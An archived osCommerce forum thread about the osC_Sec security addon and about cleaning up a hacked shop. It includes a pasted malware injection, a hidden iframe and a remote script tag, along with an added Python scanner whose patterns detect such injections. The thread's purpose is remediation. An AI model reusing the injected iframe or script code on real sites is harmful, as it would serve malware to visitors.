Oscommerce Security - Osc_Sec.php


Taipo


Other than that, did you notice any other anomalies when using $osCSpamTrap?

 

I only had spamtrap enabled in that 2.3.1 shop, and other than the attribute manager, nothing came to my attention. It's a relatively new shop, but a few sales through there have been processed fine.

I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.


Hello

 

I installed the contribution on an old osc 2.2 version.

Took me some time to set it up as I had to make some changes but everything looks fine.

 

I got 15 emails informing me of attempts to hack my site after only a couple of hours.

I also installed the IP Trap contribution.

 

The problem is that sometimes I get this warning:

PHP Warning: Cookie names can not contain any of the following '=,; \t\r\n\013\014' in includes\osc_sec.php on line 1176

 

My system runs on a dedicated server over IIS 7.5 Windows 2008 Std R2 SP1 with PHP 5.2.17

 

 

thanks


If you have $osCSpamTrap enabled, then you will probably need to disable it for now. Also make sure you are using the very latest version of osC_Sec, which I am sure you probably are.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX


Hi Taipo,

 

This morning I found an email from OSC SEC telling me (I Think) that it had banned one of my cron jobs that runs the googlefeeder.php file once per week, below is the top of the email:

 

This IP [ ] has been IP Trap banned on the http:// website by osC_Sec.php version 4.0[r9]

 

REASON FOR BAN: Request method [ ] should be in all uppercase letters.

 

Time of ban: Sat, 15 Oct 2011 23:00:02

 

.------------[ ALL $_GET VARIABLES ]-------------

#

# - /home/username/public_html/adminname/googlefeeder_php=NULL

#

`--------------------------------------------------------

 

.---------[ ALL $_POST FORM VARIABLES ]-------

#

# - No POST form data

#

 

Any Ideas?

 

Many Thanks

Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.


In osc.php disable $nonGETPOSTReqs.

 

 
$nonGETPOSTReqs = 0;


Thanks Taipo


Hi Taipo - new user thanks so much to all you great and clever coders...

Installed OSC on new site v2.2 rc2

Seems to all go ok with the exception of adding the line

require_once( DIR_FS_CATALOG . 'includes/osc_sec.php' );

Includes app_top - line 45(as above) results in white screen. rem line 45 and all ok

 

Have been over and over cannot see anything else I have missed,

the other - isset not sure as have a few sec addons as suggested if they will conflict with each other or are doing the same job..

Currently this is what is in the application_top file

Would be grateful if you can see any errors I have made by this inset, and if rem the line from Includes makes your addon non functional...

 

// set php_self in the local scope
if( !isset( $PHP_SELF ) ) {
  if ( @phpversion() >= "5.0.0" && ( !ini_get("register_long_arrays" ) || @ini_get("register_long_arrays" ) == "0" || strtolower(@ini_get("register_long_arrays" ) ) == "off" ) ) $HTTP_SERVER_VARS = $_SERVER;
  $PHP_SELF = ( ( ( strlen( ini_get('cgi.fix_pathinfo' ) ) > 0 ) && ( ( bool ) ini_get('cgi.fix_pathinfo' ) == false ) ) || !isset( $HTTP_SERVER_VARS['SCRIPT_NAME' ] ) ) ? basename( $HTTP_SERVER_VARS[ 'PHP_SELF' ] ) : basename( $HTTP_SERVER_VARS[ 'SCRIPT_NAME' ] );
}
// if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];
$PHP_SELF = (((strlen(ini_get('cgi.fix_pathinfo')) > 0) && ((bool)ini_get('cgi.fix_pathinfo') == false)) || !isset($HTTP_SERVER_VARS['SCRIPT_NAME'])) ? basename($HTTP_SERVER_VARS['PHP_SELF']) : basename($HTTP_SERVER_VARS['SCRIPT_NAME']);

 

Many many thanks

Bea


With the last piece of code you posted, either use the one in the osC_Sec package, or the one that you already had there, they both do the same thing.

 

With the 'white screen' issue, I would need to take a closer look at your site in order to see what is causing that. Can you PM me and we can work on it from there.


Thank you - changing the path from

( DIR_FS_CATALOG . 'includes/osc_sec.php' );

to

full path to the osc_sec.php file (example below):

 

 

require_once( '/home/yourusername/public/catalog/includes/osc_sec.php' );

 

Seems to have done the trick - no errors no white screen

Many thanks.


We have had Google now list our os commerce site as having malicious software.

 

This is within 6 weeks of having the site upgraded to the latest os commerce 2.3.1

 

No problem prior in 8 years !!!

 

Latest program seems to be nothing but problems and trouble !! costing $$$$$$$$ to correct


What problems are you having with the 'latest program' Kevin?


Hi Te Taipo. I am getting this only from Google Chrome !! this has only happened since upgrade by web guy to oscommerce 2.3.1; prior to that never had a problem !!

Unfortunately, Google has discovered harmful code on your site. Google users will see a warning page when they attempt to visit pages within this site.

 

After you have removed all harmful code from your site and addressed the underlying vulnerability that caused it to be compromised, you can request a review of your site.


If you are 100% sure that all the malware has been removed then you need to do two more steps.

 

Firstly you need to secure your site so that the previous attack cannot be repeated.

 

I suggest that you install the addon called osC_Sec which will achieve this.

http://www.oscommerce.com/community/contributions,7834

 

 

Secondly once that is installed then log into Google Webmaster Tools and request a review of your site.


Te Taipo. Did that, reloaded site completely plus added os security 4 r9. Result: no change. This os commerce latest edition is a disaster for commercial usage. We are being told the latest os commerce 2.3.1 has so many faults it's the worst programme ever and to have a new site with a more reliable system! Particularly as one as a business can now get a £500,000 fine for data lost!!


Unfortunately I think the issue is more about the delay caused by the lack of staff at Google more than anything else. In the past, users who have been through similar experiences have had to wait weeks before Google gave their sites the all clear, for others it took days.

 

Google search and other services that list a warning about sites as containing malware; there does not seem to be any real time automated method of unlisting your site from that. It seems that the review is done manually by staff at Google, so that would cause an unnecessary delay in getting your site the all clear.

 

The cause of course of the malware warning was not because of 2.3.1 but because of the major security hole in the older versions of osCommerce, which allowed attackers to install what are basically file managers of their own to gain complete access to your site. Because many millions of users had not updated their site to the latest version, or bothered to patch the hole, their sites were infected by these files.

 

As far as I am aware, there are no easily exploitable ways to get around the security in 2.3.1 that have been discovered so far. So then who is telling you that osCommerce 2.3.1 is the worst programme ever? I would have thought in terms of osCommerce, the outdated version you were using that got attacked would fit that criteria, because it's not 2.3.1 that almost received the prize for the most hacked web system ever, but the earlier versions.

 

There are no free cart systems out in the wild that have ever been able to escape the attention of attackers. All have had at some point in time, their security bypassed, even systems that claim to have 'concrete' level security. The two bigger issues with osCommerce are that firstly there 'was' an initial lack of core developers keeping this system up to date, and secondly when the large security holes were discovered and 2.3 was released, most users did not update, and still have not updated.

 

That has opened the door for the attack networks to permanently enter in attack vectors aimed at the outdated versions of osCommerce, into their attack matrices. The fault lies squarely with the osCommerce users who took longer than a week or so to update their sites, as I stated, to date, being almost a year after officially fixing the issue, most are still intent on running outdated and unpatched versions of osCommerce. To attackers, this is the 'gift that keeps on giving'.

 

So you have done the right thing now and updated your site and fixed the security holes. Now you have to work on Google and any other services that have blacklisted your site. There is nothing more that I or anyone else can do to sort your issues. Now you have to work on Google and any other services that have blacklisted your site, and yes there are more than just Google.


osC_Sec 4.1

What's New?

- Fix to cookie logout code for $osCSpamTrap

- Additional code added to catch advanced database injection attempts aimed at bypassing web application whitelist filtering and webserver firewalls

 

* For those updating, replace the osc_sec.php file in includes/ with the one in this package.

 

New Install instructions: see the readme.htm, as per usual, all updates contain the complete package

 

Download From: http://www.oscommerce.com/community/contributions,7834


Yes, we did all the updates including the extra security. Got site reloaded and cleared by Google, only to have the same Google warning signs + avast malware warning occur today. This os commerce latest is a disaster !!!!!!!!!!!!!!!!!!!!!!!!


I think the clue to the problem you are having stems from something you said earlier...and I quote:

 

....this has only happened since upgrade by web guy to oscommerce 2.3.1;....

 

It appears to me that whoever upgraded your site to 2.3.1 did not remove all the malicious code from whatever earlier version you were using. If you are not able to do this yourself, you will need to find someone who actually knows what they are doing to go through your site and find all the bad code.

 

There is no way of protecting your site against attacks if malicious files were transferred from the old site to the new site, (therefore then still accessible to attackers) by this 'web guy'.

 

The issue is that there is an iFrame code that has been inserted into your site's header code, but finding and removing that is only the first part of the problem; the main issue is to find the file on the site, that was transferred from the old site, which is allowing attackers to edit your site's files.


<iframe src="http://drhousenews.orge.pl/iframe.php?id=25y8z097ife4v3uzkdkty169flx367g" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

 

 

 

 

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html dir="LTR" lang="en">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Yoshkar-Ola Love Gifts</title><script src=http://infocenc.com.br/js/></script><title></title>

 

 

 

We can see this but it does not show on any of the files on the site, and having uploaded a clean backup it made no difference at all !!

The above comes from Google Chrome when right-clicking for inspect element.


If you have deleted all the files out of the site including htaccess files and then uploaded a fresh copy, then the offending piece of code is also in your backup. Which would further say to me that whoever did the clean up of your site did not do it properly.


The iFrame code is not the hack itself, that type of appended or prepended code is only possible because there will be another file (shell code as it is often called) that has been added into your site or code (probably in the images directory but not always there) that allows attackers to add such things as iFrame script. Many that upgrade from the earlier obsolete versions of osCommerce inadvertently transfer these files from the old into the new, and yes they then end up in the backup files.

 

I assume your site was originally hacked before you upgraded, so that means your URL will be on a list of sites that have had these 'shell' codes added to them, so therefore the next level in the automated attacks merely goes looking for the same files and when found, carries out the same attack or even a different one using those files.

 

You will need to go through your backups and find any files that should not be there. In particular look in the image directory (which is usually transferred from the old to the new) and any other directory of files, or files, that were transferred from the old site to the new. If you are unable to do so yourself, then ask around here if you want, there are a number of people in these forums who do this thing quite professionally.

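The check described in the post above (go through the backup, starting with the images directory, and look for files that should not be there), as an added example that is not part of the original thread or of osC_Sec. The directory name `images`, the host `shop.example`, the extension lists and every sample file are constructed assumptions; the sample files hold placeholders only.

```python
import os
import re
import tempfile

SCRIPT_EXT = {".php", ".php3", ".php5", ".phtml", ".pl", ".cgi"}
PAGE_EXT = SCRIPT_EXT | {".html", ".htm", ".js", ".tpl"}
# Only the long open tag is matched: "<?=" occurs by chance in large binary files.
PHP_TAG = re.compile(rb"<\?php", re.I)
HIDDEN_IFRAME = re.compile(
    rb"<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none)", re.I)
SCRIPT_SRC = re.compile(
    rb"<script\b[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>:]+)", re.I)


def audit_file(rel_path, data, media_dirs, own_hosts):
    """Return the reasons one file looks like it does not belong."""
    reasons = []
    parts = rel_path.lower().split("/")
    ext = os.path.splitext(parts[-1])[1]
    if any(p in media_dirs for p in parts[:-1]):
        if ext in SCRIPT_EXT:
            reasons.append("script file in media directory")
        elif PHP_TAG.search(data):
            reasons.append("PHP code inside non-script file")
    if ext in PAGE_EXT:
        if HIDDEN_IFRAME.search(data):
            reasons.append("hidden iframe")
        for raw in SCRIPT_SRC.findall(data):
            host = raw.decode("ascii", "replace").lower()
            if host not in own_hosts:
                reasons.append("off-site script: " + host)
    return reasons


def audit_tree(root, media_dirs=("images",), own_hosts=()):
    """Walk a site copy or backup; map relative path -> list of reasons."""
    findings = {}
    media = {d.lower() for d in media_dirs}
    own = {h.lower() for h in own_hosts}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                data = fh.read(2 * 1024 * 1024)  # first 2 MiB is enough here
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = audit_file(rel, data, media, own)
            if reasons:
                findings[rel] = reasons
    return findings


def build_sample_tree(root):
    """Write a small constructed tree (placeholders, no real payloads)."""
    samples = {
        "images/logo.gif": b"GIF89a" + b"\x00" * 16,
        "images/thumbs.php": b"<?php /* constructed placeholder */ ?>",
        "images/banner.jpg": b"\xff\xd8\xff\xe0<?php /* placeholder */ ?>",
        "includes/header.php": b'<head><iframe src="http://a.invalid/x" '
            b'width="10" style="visibility:hidden;position:absolute"></iframe>'
            b"<script src=http://cdn.invalid/js/></script></head>",
        "index.php": b'<script src="http://shop.example/ext/jquery.js"></script>',
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        found = audit_tree(tmp, own_hosts=["shop.example"])
        for path, reasons in sorted(found.items()):
            print(path, "->", "; ".join(reasons))
```

These are pattern matches, so an empty result does not show a tree is clean; obfuscated code or a file outside the listed directories will not be flagged. Run it against the backup as well as the live copy, since the same files end up in both.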

[removed] this company did the changes in the os commerce 2.3.1 in September having contacted me from this forum !!

 

Actually:

( I assume your site was originally hacked before you upgraded ) in 10 years we did not ever have this problem or anything like it until the NEW OS COMMERCE upgrade!!

The new os commerce site was all live as should be on the 21st September. We downloaded all the files as backup on the 21st September, so today because of the problems on y-ola we separated the alias site and made it live and uploaded the files of the 21st September backup to yoshkar-ola-gifts, this however is redirecting to :

latino-ru/merchants/index.php

then changes within 2 seconds to go to :

guide.opendns.com/main?ref=http%3A%2F%2Flatino-pay.ru%2Fmerchant%2Findex.php&w=1024&h=673


Actually:

( I assume your site was originally hacked before you upgraded ) in 10 years we did not ever have this problem or anything like it until the NEW OS COMMERCE upgrade!!

 

osCommerce versions other than 2.3.1.....going back to when the admin login was added, have been vulnerable to a specific exploit that allows attackers to upload files into your site. So if you have been using osCommerce for 10 years, then your site has been vulnerable for a long time. The vulnerability did not become common knowledge until sometime last year, and those that upgraded their sites to 2.3, or secured their admin directories before the hack became common knowledge were spared the indignation of having attack files added to directories in their site/sites.

 

Assuming all the sites that are in your main website are all version 2.3.1, you need to go through your site and any other alias sites that come off of the main site, and find these files and remove them. If you are still running earlier versions of osCommerce in 'alias' sites then you will need to either properly secure them (protect the admin, add osC_Sec to all the sites) and clean them out of shellcode files, or upgrade them to 2.3.1 being careful not to transfer any of these shellcode files from the old into the new.

 

When you have done that, attackers will no longer be able to use those files to make changes to your main core site files - irrespective of whatever version you are using.


http://www.flugelsoft.com this company did the changes in the os commerce 2.3.1 in September having contacted me from this forum !!

 

Have you been back in touch with them to let them know that your site has been hacked since they did some work on it?

 

There are a number of users here who are active in discussions in assisting people to clean up their hacked sites. I am not personally recommending anyone in particular, I am just pointing out that if you look around yourself you should be able to tell who is for real or not by the responses of others to their work.

 

You have posted a company name, if you have received bad service as you clearly have, and that user is not prepared to clean their mess up, then start another thread and name the user so that others will know to stay away from them in the future.


Archived

This topic is now archived and is closed to further replies.
